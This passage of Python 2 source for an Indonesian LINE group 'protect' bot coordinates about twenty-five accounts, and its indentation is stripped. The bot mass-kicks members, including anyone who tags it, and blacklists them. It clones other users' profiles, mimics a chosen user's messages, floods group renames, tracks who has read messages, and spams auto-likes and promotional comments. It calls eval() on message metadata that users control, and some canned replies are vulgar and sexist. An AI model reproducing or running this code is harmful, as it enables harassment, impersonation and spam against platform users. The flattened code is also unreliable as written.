k8.sendText(msg.to,"TIGA BELAS")
k9.sendText(msg.to,"EMPAT BELAS")
k10.sendText(msg.to,"LIMA BELAS")
k11.sendText(msg.to,"ENAM BELAS")
k12.sendText(msg.to,"TUJUH BELAS")
k13.sendText(msg.to,"DELAPAN BELAS")
k14.sendText(msg.to,"SEMBILAN BELAS")
k15.sendText(msg.to,"DUA PULUH")
k16.sendText(msg.to,"DUA PULUH SATU")
k17.sendText(msg.to,"DUA PULUH DUA")
k18.sendText(msg.to,"DUA PULUH TIGA")
k19.sendText(msg.to,"DUA PULUH EMPAT")
k20.sendText(msg.to,"DUA PULUH LIMA")
random.choice(KAC).sendText(msg.to,"Semua Hadir Boss\nSiap Protect Group\nAman Gak Aman Yang Penting Anu\n[? ???+? ? ¥ûDÏ ? ?+??? ?]")
#-------------Fungsi Respon Finish---------------------#
#==========================================
elif "Youtube " in msg.text.lower():
if msg.from_ in admin:
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif "youtube " in msg.text.lower():
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Vidio ' in msg.text:
if msg.from_ in admin:
try:
textToSearch = (msg.text).replace('Vidio ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght=('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to,ght)
except:
cl.sendText(msg.to,"Could not find it")
#==========================================
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
ki.sendText(msg.to,text)
kc.sendText(msg.to,text)
kk.sendText(msg.to,text)
ks.sendText(msg.to,text)
k1.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
kk.sendMessage(msg)
ki.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
k1.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
kk.sendMessage(msg)
ki.sendMessage(msg)
k1.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
# elif msg.text in ["Target list"]:
# if msg.from_ in admin:
# if mimic["target"] == {}:
# cl.sendText(msg.to,"nothing")
# else:
# mc = "Target mimic user\n"
# for mi_d in mimic["target"]:
# mc += "?? "+cl.getContact(mi_d).displayName + "\n"
# cl.sendText(msg.to,mc)
# elif "Mimic:" in msg.text:
# if msg.from_ in admin:
# cmd = msg.text.replace("Mimic:","")
# if cmd == "on":
# if mimic["status"] == False:
# mimic["status"] = True
# cl.sendText(msg.to,"turning on mimic")
#
# else:
# cl.sendText(msg.to,"mimic have been enable")
# elif cmd == "off":
# if mimic["status"] == True:
# mimic["status"] = False
# cl.sendText(msg.to,"turning off mimic")
#
# else:
# cl.sendText(msg.to,"Mimic have been desable")
# elif "Mimic target " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Mimic target ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
# if targets == []:
# cl.sendText(msg.to,"No targets")
#
# else:
# for target in targets:
# try:
# mimic["target"][target] = True
# cl.sendText(msg.to,"Success added target")
#
# #cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed")
#
# break
# elif "Untarget " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Untarget ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# gInfo = ki.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
# if targets == []:
# cl.sendText(msg.to,"No targets")
# else:
# for target in targets:
# try:
# del mimic["target"][target]
# cl.sendText(msg.to,"Success deleted target")
#cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed!")
#==========================================
elif msg.text in ["Mimic on","mimic on","Mimic:on"]:
if msg.from_ in admin:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic off","Mimic:off"]:
if msg.from_ in admin:
if wait3["copy"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list","Targetlist"]:
if msg.from_ in admin:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "?? "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if msg.from_ in admin:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#==========================================
#=======================================
elif msg.text in ["Backup","backup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
ki.updateDisplayPicture(backup.pictureStatus)
kk.updateDisplayPicture(backup.pictureStatus)
kc.updateDisplayPicture(backup.pictureStatus)
ks.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
ki.updateProfile(backup)
kk.updateProfile(backup)
kc.updateProfile(backup)
ks.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
ki.sendText(msg.to, "Refreshed.")
kk.sendText(msg.to, "Refreshed.")
kc.sendText(msg.to, "Refreshed.")
ks.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
ki.sendText(msg.to, str(e))
kk.sendText(msg.to, str(e))
kc.sendText(msg.to, str(e))
ks.sendText(msg.to, str(e))
elif msg.text in ["Gcreator:inv"]:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif "Copy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
ki.CloneContactProfile(target)
kk.CloneContactProfile(target)
kc.CloneContactProfile(target)
ks.CloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif msg.text in ["Kembali awal"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
ki.updateDisplayPicture(backup.pictureStatus)
ki.updateProfile(backup)
kk.updateDisplayPicture(backup.pictureStatus)
kk.updateProfile(backup)
kc.updateDisplayPicture(backup.pictureStatus)
kc.updateProfile(backup)
ks.updateDisplayPicture(backup.pictureStatus)
ks.updateProfile(backup)
cl.sendText(msg.to, "Backup Sukses")
except Exception as e:
cl.sendText(msg.to, str (e))
#--------------------------------------------------------
elif "rejectall" in msg.text:
X = cl.getGroupIdsInvited()
for i in X:
cl.rejectGroupInvitation(i)
#--------------------------------------------------------
#-------------Fungsi Balesan Respon Start---------------------#
elif msg.text in ["Ini Apa","ini apa","Apaan Ini","apaan ini"]:
ki.sendText(msg.to,"Ya gitu deh intinya mah ????questioning??")
#-------------Fungsi Balesan Respon Finish---------------------#
elif ("Vkick" in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
#-------------Fungsi Speedbot Start---------------------#
elif msg.text in ["Speed","Sp"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "Sabar Boss...")
elapsed_time = time.time() - start
ki.sendText(msg.to, "%sDetik" % (elapsed_time))
kk.sendText(msg.to, "%sDetik" % (elapsed_time))
cl.sendText(msg.to, "%sDetik" % (elapsed_time))
kc.sendText(msg.to, "%sDetik" % (elapsed_time))
#-------------Fungsi Speedbot Finish---------------------#
#-------------Fungsi Banned Send Contact Start------------------#
elif msg.text in ["Ban"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
elif msg.text in ["Unban"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
#-------------Fungsi Banned Send Contact Finish------------------#
elif msg.text in ["Creator"]:
msg.contentType = 13
msg.contentMetadata = {'mid': 'u6b34b703cbc5fc83cd1e5b6832a05352'}
cl.sendText(msg.to,"======================")
cl.sendMessage(msg)
cl.sendText(msg.to,"======================")
cl.sendText(msg.to,"Itu Creator Kami Yang Manis Kalem ??\nSmule : @RK_WAHYU\nNama : ???+? ? ¥ûDÏ ? ?+???\nZodiak : Sagitarius")
#-------------Fungsi Chat ----------------
elif msg.text in ["Woy","woy","Woi","woi"]:
quote = ['Istri yang baik itu Istri yang Mengizinkan Suaminya untuk Poligami ??????.','Kunci Untuk Bikin Suami Bahagia itu cuma satu..\nIzinkan Suamimu Untuk Selingkuh Coyyy ','Ah Koplak Lu','Muka Lu Kaya Jembut','Ada Orang kah disini?','Ada Janda Yang Bisa Di Ajak Mojok Gak, Euy','Ada Perawan Nganggur ga Coy?']
psn = random.choice(quote)
cl.sendText(msg.to,psn)
#-------------Fungsi Bannlist Start------------------#
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
random.choice(KAC).sendText(msg.to,"Tidak Ada Akun Terbanned")
else:
random.choice(KAC).sendText(msg.to,"Blacklist user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Bannlist Finish------------------#
elif msg.text in ["Cek ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
random.choice(KAC).sendText(msg.to,cocoa + "")
elif msg.text in ["Kill ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
elif msg.text in ["Clear"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif "random: " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
strnum = msg.text.replace("random: ","")
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.01)
group.name = name
cl.updateGroup(group)
except:
cl.sendText(msg.to,"Error")
elif "albumat'" in msg.text:
try:
albumtags = msg.text.replace("albumat'","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "fakecat'" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
anu = msg.text.replace("fakecat'","")
random.choice(KAC).sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
#--------------------------------------------------------
elif "Recover" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("Recover", mi_d)
cl.sendText(msg.to,"Success recover")
#--------------------------------------------------------
#--------------------------------------------------------
elif msg.text in ["Remove all chat"]:
if msg.from_ in owner:
cl.removeAllMessages(op.param2)
ki.removeAllMessages(op.param2)
kk.removeAllMessages(op.param2)
kc.removeAllMessages(op.param2)
ks.removeAllMessages(op.param2)
k1.removeAllMessages(op.param2)
k2.removeAllMessages(op.param2)
k3.removeAllMessages(op.param2)
k4.removeAllMessages(op.param2)
k5.removeAllMessages(op.param2)
k6.removeAllMessages(op.param2)
k7.removeAllMessages(op.param2)
k8.removeAllMessages(op.param2)
k9.removeAllMessages(op.param2)
k10.removeAllMessages(op.param2)
k11.removeAllMessages(op.param2)
k12.removeAllMessages(op.param2)
k13.removeAllMessages(op.param2)
k14.removeAllMessages(op.param2)
k15.removeAllMessages(op.param2)
k16.removeAllMessages(op.param2)
k17.removeAllMessages(op.param2)
k18.removeAllMessages(op.param2)
k19.removeAllMessages(op.param2)
k20.removeAllMessages(op.param2)
cl.sendText(msg.to,"Removed all chat")
#---------------------------
#KICK_BY_TAG
elif "Boom " in msg.text:
if msg.from_ in Creator:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
print mentionees
for mention in mentionees:
ki.kickoutFromGroup(msg.to,[mention['M']])
#===========================================
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
# if op.param1 in autocancel:
# OWN = "ua7fc5964d31f45ac75128fc2b8deb842","u406133ad4d3fbe50a2f4d51ea081d050","ua51ba06b0dd18c0bfe2cc6caa3458202","uc7f32bb28dc009916d40af87c9910ddc"
# if op.param2 in OWN:
# pass
# else:
# Inviter = op.param3.replace("",',')
# InviterX = Inviter.split(",")
# contact = cl.getContact(op.param2)
# cl.cancelGroupInvitation(op.param1,InviterX)
# ki.cancelGroupInvitation(op.param1,InviterX)
# kk.cancelGroupInvitation(op.param1,InviterX)
# ks.cancelGroupInvitation(op.param1,InviterX)
# kc.cancelGroupInvitation(op.param1,InviterX)
# ka.cancelGroupInvitation(op.param1,InviterX)
# cl.kickoutFromGroup(op.param1,[op.param2])
# ki.kickoutFromGroup(op.param1,[op.param2])
# kk.kickoutFromGroup(op.param1,[op.param2])
# ks.kickoutFromGroup(op.param1,[op.param2])
# kc.kickoutFromGroup(op.param1,[op.param2])
# ka.kickoutFromGroup(op.param1,[op.param2])
# wait["blacklist"][op.param2] = True
# f=codecs.open('st2__b.json','w','utf-8')
# json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#------------------------------------------------------------------------------------
if op.type == 32:
OWN = ""
if op.param2 in Bots and admin:
pass
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
contact = cl.getContact(op.param2)
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
k1.kickoutFromGroup(op.param1,[op.param2])
k2.kickoutFromGroup(op.param1,[op.param2])
k3.kickoutFromGroup(op.param1,[op.param2])
k4.kickoutFromGroup(op.param1,[op.param2])
k5.kickoutFromGroup(op.param1,[op.param2])
k6.kickoutFromGroup(op.param1,[op.param2])
k7.kickoutFromGroup(op.param1,[op.param2])
k8.kickoutFromGroup(op.param1,[op.param2])
k9.kickoutFromGroup(op.param1,[op.param2])
k10.kickoutFromGroup(op.param1,[op.param2])
k11.kickoutFromGroup(op.param1,[op.param2])
k12.kickoutFromGroup(op.param1,[op.param2])
k13.kickoutFromGroup(op.param1,[op.param2])
k14.kickoutFromGroup(op.param1,[op.param2])
k15.kickoutFromGroup(op.param1,[op.param2])
k16.kickoutFromGroup(op.param1,[op.param2])
k17.kickoutFromGroup(op.param1,[op.param2])
k18.kickoutFromGroup(op.param1,[op.param2])
k19.kickoutFromGroup(op.param1,[op.param2])
k20.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#===========================================
# if op.type == 26:
# if "@"+cl.getProfile().displayName in msg.text:
# tanya = msg.text.replace("@"+cl.getProfile().displayName,"")
# jawab = ("Jgn Tag Gw woyy!!\nlagi ngocok dulu...!!!","Berisik jgn tag Gw Koplak","Gw Sibuk, Gausah di Tag!!!","Ngapain tag neh,, kangen yah...!!!")
# jawaban = random.choice(jawab)
# cl.sendText(msg.to,jawaban)
elif "@"+cl.getProfile().displayName in msg.text:
try:
tanya = msg.text.replace("@"+cl.getProfile().displayName,"")
jawab = ("Jgn Tag Si "+cl.getProfile().displayName+"Ta cipok luh..!!","Berisik jgn tag si "+cl.getProfile().displayName+" dia lagi asyik ngocok...!!!")
jawaban = random.choice(jawab)
random.choice(KAC).sendText(msg.to,jawaban)
random.choice(KAC).kickoutFromGroup(msg.to,[msg.from_])
except:
pass
#---------CCTV-----------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n[•]" + Name
wait2['ROM'][op.param1][op.param2] = "[•]" + Name
else:
cl.sendText
except:
pass
#---------------------
# if op.type == 17:
# if op.param2 in Bots:
# return
# ginfo = cl.getGroup(op.param1)
# random.choice(KAC).sendText(op.param1, "Welcome\nSelamat Datang Di " + str(ginfo.name))
# random.choice(KAC).sendText(op.param1, "Founder =>>> " + str(ginfo.name) + " :\n" + ginfo.creator.displayName)
# random.choice(KAC).sendText(op.param1, "?? Semoga Betah Kk ??\nNo Baper,No nakal,No Ngeyel ya,No Bulshit")
# print "MEMBER HAS JOIN THE GROUP"
# if op.type == 15:
# if op.param2 in Bots:
# return
# random.choice(KAC).sendText(op.param1, "Baper Tuh Orang :v\nBelum di Anu Kayanya ??")
# print "MEMBER HAS LEFT THE GROUP"
#--------------------------------------------------------
# if 'MENTION' in mid or Amid or Bmid or Cmid or Dmid or Emid or Fmid or Gmid or Hmid or Imid:
# cl.sendtext(msg.to,'[Auto Respon]\nngapain tag, pc langsung aja...!!!')
# pass
#--------------------------------------------------------
#Restart_Program
elif msg.text in ["Bot restart"]:
if msg.from_ in Creator:
cl.sendText(msg.to, "Bot has been restarted")
restart_program()
print "@Restart"
else:
cl.sendText(msg.to, "No Access")
#--------------------------------------------------------
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def autolike():
for zx in range(0,500):
hasil = cl.activity(limit=500)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"??aµt?l??€ By? ???+? ? ¥ûDÏ ? ?+??? ??t ???\n\n?º°°°? ???+? ? ¥ûDÏ ? ?+??? ?°°°?(^?^)\naµt?l??€ by ???+? ? ¥ûDÏ ? ?+??? ??? »»» http://line.me/ti/p/yudi_std02 «««")
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka ??")
kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka ??")
kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka ??")
ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka ??")
k1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
k1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka ??")
k2.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
k2.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka ??")
k3.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
k3.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka ??")
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"??aµt?l??€ By? ???+? ? ¥ûDÏ ? ?+??? ??t ???\n\n?º°°°? ???+? ? ¥ûDÏ ? ?+??? ?°°°?(^?^)\naµt?l??€ by ???+? ? ¥ûDÏ ? ?+??? ??? »»» http://line.me/ti/p/yudi_std02 «««")
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(0.01)
#thread3 = threading.Thread(target=autolike)
#thread3.daemon = True
#thread3.start()
#--------------------
def likePost():
for zx in range(0,500):
hasil = cl.activity(limit=500)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in owner:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k2.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k3.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k4.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k5.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k6.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k7.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k8.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k9.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k10.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k11.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k12.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k13.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k14.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k15.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k16.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k17.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k18.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k19.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k20.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"??aµt?l??€ By? ???+? ? ¥ûDÏ ? ?+??? ??t ???\n\n?º°°°? ???+? ? ¥ûDÏ ? ?+??? ?°°°?(^?^)\naµt?l??€ by ???+? ? ¥ûDÏ ? ?+??? ??? »»» http://line.me/ti/p/yudi_std02 «««")
ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"??aµt?l??€ By? ???+? ? ¥ûDÏ ? ?+??? ??t ???\n\n?º°°°? ???+? ? ¥ûDÏ ? ?+??? ?°°°?(^?^)\naµt?l??€ by ???+? ? ¥ûDÏ ? ?+??? ??? »»» http://line.me/ti/p/yudi_std02 «««")
kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"??aµt?l??€ By? ???+? ? ¥ûDÏ ? ?+??? ??t ???\n\n?º°°°? ???+? ? ¥ûDÏ ? ?+??? ?°°°?(^?^)\naµt?l??€ by ???+? ? ¥ûDÏ ? ?+??? ??? »»» http://line.me/ti/p/yudi_std02 «««")
